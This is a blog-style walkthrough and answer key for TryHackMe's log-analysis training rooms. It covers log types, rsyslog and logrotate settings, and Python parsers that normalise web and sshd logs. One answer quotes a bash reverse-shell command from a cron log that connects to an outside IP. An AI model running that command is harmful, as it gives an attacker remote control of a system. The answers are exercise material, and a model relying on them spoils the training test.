We covered an introduction to logging where we discussed the logic of creating logs and why we create them. Logs are generated to track performance, analyze security incidents and establish a pattern from which future events can be predicted. Logs can be system logs, application logs, security logs, audit logs, server logs and database logs. The process of log management starts with collecting logs, storing them in a central location, parsing them and then analyzing them with log analysis tools and a SIEM. This is a walkthrough of the TryHackMe Intro to Logs room, which is part of the TryHackMe SOC Level 2 track.
This post also covers the answers for TryHackMe Log Operations Room.
Highlights
Log files are records of events committed to a file in a list format. They can include all sorts of information about events that happened at a particular time. Every device on the network creates log files, thus giving you a history of what’s been happening.
Logs typically contain five headed-up areas. They are:
- Timestamp – the time of the event.
- Log level – how severe or important the event is.
- Username – who caused the event.
- Service or application – what caused the event.
- Event description – what has happened.
Log file types
- Event log – records information about the usage of network traffic and tracks login attempts, application events, and failed password attempts.
- System log (or syslog) – records operating system events, including startup messages, system changes, shutdowns, and errors and warnings.
- Server log – contains a record of activities in a text document related to a specific server over a specific period of time.
- Change log – lists changes made to an application or file.
- Availability log – tracks uptime, availability, and system performance.
- Authorization and access log – lists who is accessing applications or files.
- Resource log – provides information on connectivity issues and any capacity problems.
Log types as categorised in the room:
- Application Logs – messages about specific applications, including status, errors, warnings, etc.
- Audit Logs – activities related to operational procedures crucial for regulatory compliance.
- Security Logs – security events such as logins, permissions changes, firewall activity, etc.
- Network Logs – network traffic, connections, and other network-related events.
- Database Logs – activities within a database system, such as queries and updates.
- Web Server Logs – requests processed by a web server, including URLs, response codes, etc.
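To make the five-field model concrete for the web server log type, here is an added example (not from the room or the TryHackMe material) that parses nginx lines in the combined format, the format of the access.log investigated later in the room, into the timestamp/level/username/service/description schema. The service name "nginx", the status-to-level mapping and the sample lines are assumptions.

```python
import re
from datetime import datetime

# Apache/nginx "combined" format:
# host ident authuser [date] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

def level_from_status(status: int) -> str:
    """Derive a log level from the HTTP status class (assumed mapping: 5xx error, 4xx warning)."""
    if status >= 500:
        return "error"
    return "warning" if status >= 400 else "info"

def parse_combined(line: str):
    """Normalise one combined-format line into the five common log fields (plus raw extras)."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    status = int(m["status"])
    return {
        "timestamp": datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z").isoformat(),
        "level": level_from_status(status),
        "username": None if m["user"] == "-" else m["user"],   # "-" means no authuser
        "service": "nginx",                                     # assumed: the web server's access.log
        "description": f'{m["request"]} -> {status} from {m["host"]}',
        "source_ip": m["host"],
        "status": status,
    }

def parse_all(lines):
    """Return (normalised records, number of lines that did not match the format)."""
    records, unparsed = [], 0
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            unparsed += 1
        else:
            records.append(rec)
    return records, unparsed

# Constructed sample lines (not taken from the room's access.log)
SAMPLE = [
    '10.0.0.5 - - [14/Aug/2023:10:15:01 +0000] "GET /users/sign_in HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [14/Aug/2023:10:15:03 +0000] "POST /users/sign_in HTTP/1.1" 302 118 "http://gitlab.example/users/sign_in" "Mozilla/5.0"',
    '10.0.0.9 - admin [14/Aug/2023:10:16:44 +0000] "GET /admin HTTP/1.1" 403 231 "-" "curl/7.88.1"',
    "Aug 14 10:17:01 websrv-02 sshd[1201]: not a combined-format line",
]
```

Lines that do not match the format are counted rather than silently dropped, which is the first thing to check when a log viewer reports a field it cannot find.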
Room Answers | TryHackMe Intro to Logs
What is the name of your colleague who left a note on your Desktop?
Perry
What is the full path to the suggested log file for initial investigation?
/var/log/gitlab/nginx/access.log
Based on the list of log types in this task, what log type is used by the log file specified in the note from Task 2?
web server log
Based on the list of log formats in this task, what log format is used by the log file specified in the note from Task 2?
combined
After configuring rsyslog for sshd, what username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing?
stansimon
What is the IP address of SIEM-02 based on the rsyslog configuration file /etc/rsyslog.d/99-websrv-02-cron.conf, which is used to monitor cron messages?
10.10.10.101
Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?
/bin/bash -c "/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1"
Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, how many versions of old compressed log file copies will be kept?
24
Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, what is the log rotation frequency?
hourly
Upon accessing the log viewer URL for unparsed raw log files, what error does “/var/log/websrv-02/rsyslog_cron.log” show when selecting the different filters?
no date field
What is the process of standardising parsed data into a more easily readable and query-able format?
Normalisation
What is the process of consolidating normalised logs to enhance the analysis of activities related to a specific IP address?
Enrichment
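Normalisation and enrichment applied to the kind of sshd output rsyslog writes in the room, as an added example that is not part of the original walkthrough: each line is mapped onto the common five-field schema, the normalised records are consolidated per source IP, and usernames with repeated failures are flagged. The traditional rsyslog layout, the failure threshold of 3 and the sample lines are assumptions.

```python
import re
from collections import Counter, defaultdict

# Traditional rsyslog layout: "Mon DD HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(
    r'(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) '
    r'(?P<prog>[\w-]+)(?:\[\d+\])?: (?P<msg>.*)')
# OpenSSH authentication outcome wording inside the message
AUTH_RE = re.compile(
    r'(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?'
    r'(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+')

def normalise(line):
    """Map one sshd line onto the common five-field schema; None if not an auth event."""
    m = SYSLOG_RE.match(line)
    a = AUTH_RE.search(m["msg"]) if m else None
    if not a:
        return None
    return {"timestamp": m["ts"], "service": m["prog"], "username": a["user"],
            "level": "warning" if a["result"] == "Failed" else "info",
            "description": f'{a["result"]} {a["method"]}', "source_ip": a["ip"]}

def enrich_by_ip(records):
    """Consolidate normalised records per source IP: failed count and usernames tried."""
    by_ip = defaultdict(lambda: {"failed": 0, "users": set()})
    for r in records:
        by_ip[r["source_ip"]]["users"].add(r["username"])
        if r["level"] == "warning":
            by_ip[r["source_ip"]]["failed"] += 1
    return dict(by_ip)

def brute_force_candidates(records, threshold=3):
    """Usernames with at least `threshold` failed logins (threshold is an assumed tuning value)."""
    failed = Counter(r["username"] for r in records if r["level"] == "warning")
    return sorted(u for u, n in failed.items() if n >= threshold)

# Constructed sample lines in the traditional rsyslog layout (not the room's log file)
SAMPLE = [
    "Aug 14 10:17:01 websrv-02 sshd[1201]: Failed password for invalid user stansimon from 203.0.113.7 port 51234 ssh2",
    "Aug 14 10:17:03 websrv-02 sshd[1201]: Failed password for invalid user stansimon from 203.0.113.7 port 51236 ssh2",
    "Aug 14 10:17:05 websrv-02 sshd[1201]: Failed password for invalid user stansimon from 203.0.113.7 port 51238 ssh2",
    "Aug 14 10:18:40 websrv-02 sshd[1310]: Accepted publickey for deploy from 10.0.0.2 port 40022 ssh2",
    "Aug 14 10:19:00 websrv-02 CRON[1400]: (root) CMD (/usr/bin/true)",
]

def analyse(lines):
    """Normalise all lines, then return (per-IP enrichment, brute-force candidate users)."""
    records = [r for r in map(normalise, lines) if r]
    return enrich_by_ip(records), brute_force_candidates(records)
```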
Room Answers | TryHackMe Log Operations
Which of the given log purposes would be suitable to measure the cost of using a service?
Operational
Which of the given log purposes would be suitable for investigating application logs for enhancement and stability?
Debug
You are a consultant working for a growing startup. As a consultant, you participated in a log configuration planning session. The company you work for is working to get compliant to process payment information. The given question set is being discussed.
Which question’s answer can be “as much as mentioned in the PCI DSS requirements.”?
How much do you need to log
The session continues, and your teammates need your help; they will negotiate for logging budget and operation details. As a consultant, you must remind them of a vital point:
Which requirements are non-negotiable?
operational and security requirements
Your team is working on policies to decide which logs will be stored and which portion will be available for analysis.
Which of the given logging principles would be implemented and improved?
Archiving and Accessibility
Your team implemented a brand new API logging product. One of the team members has been tasked with collecting the logs generated by that new product. The team member reported continuous errors when transferring the logs to the review platform.
In this case, which of the given difficulties occurs?
Process and Archive
As a consultant, you are doing a comprehensive risk assessment and noticed that one of the development teams implemented a custom script to generate logs for an old system, which omits loggings at some phases.
What would you call this? (Mistake or Practice?)
Mistake